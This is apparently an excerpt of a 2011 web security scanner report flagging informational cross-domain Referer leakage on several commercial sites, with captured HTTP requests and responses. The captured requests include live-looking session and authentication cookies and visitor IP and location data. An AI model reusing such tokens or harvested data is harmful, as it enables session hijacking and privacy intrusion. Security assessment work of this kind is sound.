<!-- $Id: //application/service/version/9.1/SelfService/src/web-apps/SelfSe
...[SNIP]...
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.78. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigcommerce.com
Path:   /lp/e1-lp-ecommerce.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /lp/e1-lp-ecommerce.php?ga_campaign=(roi)+ecommerce&ga_adgroup=ecommerce+solutions&ga_keyword=e+commerce+solutions&gclid=CI2H3L74iKsCFRE9gwodYgUI1Q HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6564
Connection: close
Content-Type: text/html

<html>
<head>
   <!-- Google Analytics (V3) MUST IMMEDIATELY FOLLOW OPENING <head> TAG BEFORE GOOGLE WEBSITE OPTIMIZER -->
<script type="text/javascript" src="https://www.bigcommerce.com/js/gascript.js?
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1031608255/?label=_lLiCJXWjQIQv6_06wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
<!-- display ad campaign take 2 -->
<img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&betr=bigcommerce_cs=[+]1[720],3[8760]" width="1" height="1" border="0">

<img height="1" width="1" style="border-style:none;" alt="" src="https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-bigcommerce"/>


<!-- time zone storage for leads -->
...[SNIP]...

19.79. http://www.cnbc.com/js/cnbc_quote_components.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /js/cnbc_quote_components.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /js/cnbc_quote_components.js?rti=201008 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; adops_master_kvs=; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; s_cc=true; xaikeeperua=yes; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 17:17:01 GMT
Via: 1.1 C aicache6
Content-Length: 155345
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 17:17:01 GMT


var cnbc_mrq_numElements=5;var cnbc_mrq_expiration_hours=24;var cnbc_mrq_baseCookieName='cnbc_most_recent_quotes';var cnbc_mrq_baseDivId='cnbc_most_recent_symbol_';var cnbc_mrq_symbols_getDataQueue;
...[SNIP]...
<div style="margin-left:5px;">';html+='<OBJECT Name="CNBC chart" Width="200" Height="175" codebase="http://java.sun.com/update/1.5.0/jinstall-1_5_0-windows-i586.cab#Version=1,5,0" classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" MAYSCRIPT="" >';html+='<PARAM NAME="Archive" VALUE="http://'+server+'/api/tickbytick/cnbc.jar"/>
...[SNIP]...

19.80. http://www.covergirl.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /__utm.gif

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /__utm.gif?utmwv=5.1.5&utms=1&utmn=781314454&utmhn=www.covergirl.com&utmcs=UTF-8&utmsr=1920x1200&utmsc=16-bit&utmul=en-us&utmje=1&utmfl=10.3%20r183&utmdt=Beauty%20Products%20from%20COVERGIRL&utmhid=790143979&utmr=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DDirect%2BBeauty%2BProduct&utmp=%2Fbeauty-products%3Futm_source%3Dgoogle%26utm_medium%3Dcpc%26utm_term%3D%25252Bbeauty%252520%25252Bproducts%26utm_campaign%3DCG%2BEvergreen%2BGKW%2B-%2B1011%2B-%2BBMM%26utm_content%3Ds9xEppg8V%257C7750439198 HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx; sifrFetch=true; __utma=214218501.640054455.1315345533.1315345533.1315345533.2; __utmb=214218501.1.10.1315345533; __utmc=214218501; __utmz=214218501.1315345533.2.2.utmcsr=google|utmccn=CG%20Evergreen%20GKW%20-%201011%20-%20BMM|utmcmd=cpc|utmctr=%20beauty%20%20products|utmcct=s9xEppg8V|7750439198

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:37 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=3232132;type=homep318;cat=us_12879;ord=1?" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
<p style="margin-top: 17px; text-align: right; width: 457px;"><a href="http://www.facebook.com/covergirl?sk=app_160134610689223" class="buttonlink">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;GO NOW&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a>
...[SNIP]...
</p>

<a id="ctl00_MainContent_hypCallOut1Link" class="calltoaction" href="http://www.bhg.com/health-family/mind-body-spirit/beauty/bnpa-beauty-health">SEE THE WINNERS</a>
...[SNIP]...
<img src="/Images/logo_bbb.gif" width="22" height="35" alt="Better Business Bureau"
class="bbb" />-->
<a id="ctl00_hypFooterLogo" href="http://www.bbbonline.org/cks.asp?id=292000103" target="_blank"><img id="ctl00_imgFooterLogo" class="bbb" src="/images/en-US/navigation/logo_bbb.gif" style="height:35px;width:22px;border-width:0px;" />
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl01_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl01_hypFooterElements" href="http://www.pg.com/terms.html" target="_blank">Terms & Conditions</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl02_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl02_hypFooterElements" href="http://www.pg.com/privacy/english/privacy_notice.html" target="_blank">Privacy Statement</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl03_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl03_hypFooterElements" href="http://www.pg.com/news/index.jhtml" target="_blank">Press</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl04_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl04_hypFooterElements" href="http://www.covergirl.ca/en_ca/" target="_blank">Canada Site</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl09_liFooterLink" class="facebook">
<a id="ctl00_rptFooterLinks_ctl09_hypFooterElements" href="http://www.facebook.com/covergirl" target="_blank">Facebook</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl10_liFooterLink" class="youtube">
<a id="ctl00_rptFooterLinks_ctl10_hypFooterElements" href="http://www.youtube.com/covergirl" target="_blank">YouTube</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl11_liFooterLink" class="twitter last">
<a id="ctl00_rptFooterLinks_ctl11_hypFooterElements" href="http://www.twitter.com/covergirl" target="_blank">Twitter</a>
...[SNIP]...
</script>


<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

19.81. http://www.covergirl.com/beauty-products

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /beauty-products

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198 HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:27 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=3232132;type=produ790;cat=us_12493;ord=1?" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
<img src="/Images/logo_bbb.gif" width="22" height="35" alt="Better Business Bureau"
class="bbb" />-->
<a id="ctl00_hypFooterLogo" href="http://www.bbbonline.org/cks.asp?id=292000103" target="_blank"><img id="ctl00_imgFooterLogo" class="bbb" src="/images/en-US/navigation/logo_bbb.gif" style="height:35px;width:22px;border-width:0px;" />
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl01_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl01_hypFooterElements" href="http://www.pg.com/terms.html" target="_blank">Terms & Conditions</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl02_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl02_hypFooterElements" href="http://www.pg.com/privacy/english/privacy_notice.html" target="_blank">Privacy Statement</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl03_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl03_hypFooterElements" href="http://www.pg.com/news/index.jhtml" target="_blank">Press</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl04_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl04_hypFooterElements" href="http://www.covergirl.ca/en_ca/" target="_blank">Canada Site</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl09_liFooterLink" class="facebook">
<a id="ctl00_rptFooterLinks_ctl09_hypFooterElements" href="http://www.facebook.com/covergirl" target="_blank">Facebook</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl10_liFooterLink" class="youtube">
<a id="ctl00_rptFooterLinks_ctl10_hypFooterElements" href="http://www.youtube.com/covergirl" target="_blank">YouTube</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl11_liFooterLink" class="twitter last">
<a id="ctl00_rptFooterLinks_ctl11_hypFooterElements" href="http://www.twitter.com/covergirl" target="_blank">Twitter</a>
...[SNIP]...
</script>


<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

19.82. http://www.csc.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csc.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=xss HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.1.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; visitor_action=content_id%3D29513%26zone_id%3D509%26content_type_id%3D13%26visits%3D1%26traffic_source%3Dreferral%26referrer%3Dwww.oracle.com/openworld/tools/mobile/index.html; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:08:57 GMT
Status: 200
ETag: "1673c8635aa207a1de3af02d09940037"
X-Runtime: 14
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate, max-age=86400
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26zone_id%3D509%26traffic_source%3Ddirect%2Creferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26traffic_source%3Ddirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT
Set-Cookie: _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; path=/; HttpOnly
Expires: Wed, 07 Sep 2011 16:08:57 GMT
Vary: Accept-Encoding
Content-Length: 9018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<noscript>
<a href="http://www.omniture.com">
<img src="http://computersciences.112.2o7.net/b/ss/csccomdev/1/H.15.1--NS/0" height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

19.83. http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cvs.com
Path:   /CVSApp/promoContent/promoLandingTemplate.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google HTTP/1.1
Host: www.cvs.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:40 GMT
Server: Apache-Coyote/1.1
X-HP-CAM-COLOR: V=1;ServerAddr=HUTy7wKKcZBJ+snDqdX2/g==;GUID=1|v2-QkLk0k1KwHzJd1VhmMdZIuGGBhJY04BWxnXwFEE7mWgY1E9PA8MxLexKjvy9O|L0NWU0FwcC9wcm9tb0NvbnRlbnQvcHJvbW9MYW5kaW5nVGVtcGxhdGUuanNw
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:45:41 GMT
Vary: Accept-Encoding
Content-Length: 55279


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta
...[SNIP]...
<li id="photo"><a href="http://www.cvsphoto.com/home.aspx" rel="external" target="_blank" title="Opens CVS Photo Center external site in a new window" onmouseover="document.getElementById('photocentericon').src='/CVSApp/images/common/photo_on.png'" onfocus="document.getElementById('photocentericon').src='/CVSApp/images/common/photo_on.png'" onmouseout="document.getElementById('photocentericon').src='/CVSApp/images/common/photo.png'" onblur="document.getElementById('photocentericon').src='/CVSApp/images/common/photo.png'"><img src="/CVSApp/images/common/photo.png" alt="CVS Photo Center" id="photocentericon" />
...[SNIP]...
<li><a href="http://print.coupons.com/alink.asp?go=14415oj9710" rel="external" target="_blank" title="Opens In-store Coupons external site in a new window">In-store Coupons<span class="hidden">
...[SNIP]...
<noscript><iframe src="http://view.atdmt.com/iaction/msrcvs_2011ECBCQ2BCLandingPage_6" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<div class="promo"><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryCosmetics_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/cosmetics.jpg" alt="Cosmetics" /></a><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategorySkinCare_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/skincare.jpg" alt="Skin Care" /></a><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHairCare_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/hair.jpg" alt="Hair Care" />
...[SNIP]...
<div class="promo"><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryFragrances_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/fragrance.jpg" alt="Fragrances" /></a><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHairColor_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/haircolor.jpg" alt="Hair Color" /></a><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHairAppliances_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/appliances.jpg" alt="Hair Appliances" />
...[SNIP]...
<div class="promo"><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHairAccessories_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/hairaccessories.jpg" alt="Hair Accessories" /></a><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHosiery_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/hosiery.jpg" alt="Hosiery" /></a><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategorySunCare_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/suncare.jpg" alt="Sun Care" />
...[SNIP]...
<div class="promo"><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHealthySkinCare_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/healthyskincare.jpg" alt="Healthy Skin Care" />
...[SNIP]...
<img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/receipt2.jpg" width="294" height="55" /><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2LinktotheCircular_1" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/weeklyad1.jpg" width="354" height="55" />
...[SNIP]...
<br /><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2MeetTheBoardLink_1" onclick="dcsMultiTrack('DCS.dcsuri','/cvsbeautyclub','WT.ti','MeetBoard','WT.sp','Rx;OTC','WT.ac','BCLand_MeetBoard');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/meetboard_button.jpg" style="margin-left: 40px;"/>
...[SNIP]...
<td><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2LiveChat_1" target="_blank"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/board3.jpg" width="222" height="423"/>
...[SNIP]...
<img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/sponsors.jpg" alt="" width="184" height="42" /><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2NiveaShopNowLink_1"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/sponsor1.jpg" alt="" width="85" height="42" />
...[SNIP]...
<br />
<a href="https://view.atdmt.com/action/msrcvs_2011ECBCQ2ExtraCareEmail_6" onclick="dcsMultiTrack('DCS.dcsuri','/email','WT.ti','Email Sign Up','WT.sp','Rx;OTC','WT.ac','BCLand_Emailsignup');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/email-new.jpg" alt="Sign up today &gt;" width="224" height="194" longdesc="Sign up for ExtraCare email & get coupons, tips and .new produc
...[SNIP]...
<br />
<a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2FacebookLink_6" onclick="dcsMultiTrack('DCS.dcsuri','/cvsbeautyclub','WT.ti','Facebook','WT.sp','Rx;OTC','WT.ac','BCLand_Facebook');" rel="external" target="_blank" title="Opens Facebook BeautyClub external site in a new window"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/facebook.jpg" alt="Facebook" width="36" height="45" />
...[SNIP]...
</a>

<a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2TwitterLink_6" onclick="dcsMultiTrack('DCS.dcsuri','/cvsbeautyclub','WT.ti','Twitter','WT.sp','Rx;OTC','WT.ac','BCLand_Twitter');" rel="external" target="_blank" title="Opens Twitter external site in a new window"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/twitter.jpg" alt="Twitter" width="38" height="45" />
...[SNIP]...
</a>

<a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2YouTubeChannelLink_6" onclick="dcsMultiTrack('DCS.dcsuri','/CVSPharmacyVideos','WT.ti','YouTube','WT.sp','Rx;OTC','WT.ac','BCLand_YouTube');" rel="external" target="_blank" title="Opens Youtube external site in a new window"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/youtube.jpg" alt="YouTube" width="49" height="45" />
...[SNIP]...
<br />
<a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2JoinTheConversationLink_1" style="color:#e93688" onclick="dcsMultiTrack('DCS.dcsuri','/cvsbeautyclub','WT.ti','Facebook','WT.sp','Rx;OTC','WT.ac','BCLand_Facebook');" rel="external" target="_blank" title="Opens Facebook external site in a new window">Join the conversation &gt;<span class="hidden">
...[SNIP]...
<br />
<a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2JoinNowLink_6"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/joinnow.gif" alt="Join now &gt;" width="224" height="58" />
...[SNIP]...
<span class="footer_text grey">*The following categories qualify towards your beauty purchases: <a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryCosmetics_6">Cosmetics</a>
...[SNIP]...
<li><a href="http://www.minuteclinic.com" target="_blank" title="Opens MinuteClinic external site in a new window" onclick="dcsMultiTrack('DCS.dcsuri','/minuteclinic/default.aspx','WT.ti','Minute Clinic','WT.sp','Rx;OTC');window.open('http://www.minuteclinic.com');return false;">MinuteClinic</a>
...[SNIP]...
<li><a href="http://www.cvsphoto.com/home.aspx" target="_blank" title="Opens CVS Photo external site in a new window">CVS Photo</a></li>
<li><a href="http://cvs.shoplocal.com/cvs/new_user_entry.aspx?action=entryflash&" target="_blank" title="Opens Weekly Store Ads external site in a new window" onclick="dcsMultiTrack('DCS.dcsuri','/shoplocal/circular/default.aspx','WT.ti','Store Circular','WT.sp','Rx;OTC');window.open('http://cvs.shoplocal.com/cvs/new_user_entry.aspx?action=entryflash&');return false;">Weekly Store Ads</a>
...[SNIP]...
<li><a href="http://www.cvscaremark.com" target="_blank" title="Opens CVS Caremark external site in a new window">CVS Caremark</a>
...[SNIP]...
<li><a href="http://www.cvscaremark.com/careers" target="_blank" title="Opens CVS Caremark Careers external site in a new window">Careers</a></li>
<li><a href="http://www.cvscaremark.com/community" target="_blank" title="Opens CVS Caremark Community external site in a new window">Community</a></li>
<li><a href="http://www.cvscaremark.com/investors" target="_blank" title="Opens CVS Caremark Investors external site in a new window">Investors</a></li>
<li><a href="http://www.cvscaremark.com/patient-privacy" target="_blank" title="Opens CVS Caremark Patient Privacy external site in a new window">Patient Privacy</a>
...[SNIP]...
<span class="hidden"><a href="http://get.adobe.com/reader/" rel="external" target="_blank" title="Opens Adobe external site in a new window">Get Adobe PDF Reader</a>
...[SNIP]...
<li><a href="http://www.cvscaremark.com/newsroom" target="_blank" title="Opens CVS Caremark Newsroom external site in a new window">Newsroom</a></li>
<li><a href="http://www.cvscaremarkrealty.com" target="_blank" title="Opens CVS Real Estate external site in a new window">Real Estate</a>
...[SNIP]...
<li><a href="http://www.cvssuppliers.com" target="_blank" title="Opens CVS Suppliers external site in a new window">Suppliers</a>
...[SNIP]...
<div id="vipps" class="lnk_cont_gry">
<a href="http://vipps.nabp.net/verify.asp" target="_blank" title="Opens VIPPS external site in a new window"><img src="/CVSApp/images/common/logo_footer.gif" alt="VIPPS" />
...[SNIP]...

19.84. http://www.cvs.com/CVSApp/search/search.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cvs.com
Path:   /CVSApp/search/search.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:
When the browser follows or fetches any of these cross-domain links it sends the loading URL, query string included, in the Referer header unless a referrer policy restricts it, so the query string values (search terms, campaign IDs and any probe strings the scanner placed there) are disclosed to those third-party hosts.

Request

GET /CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0 HTTP/1.1
Host: www.cvs.com
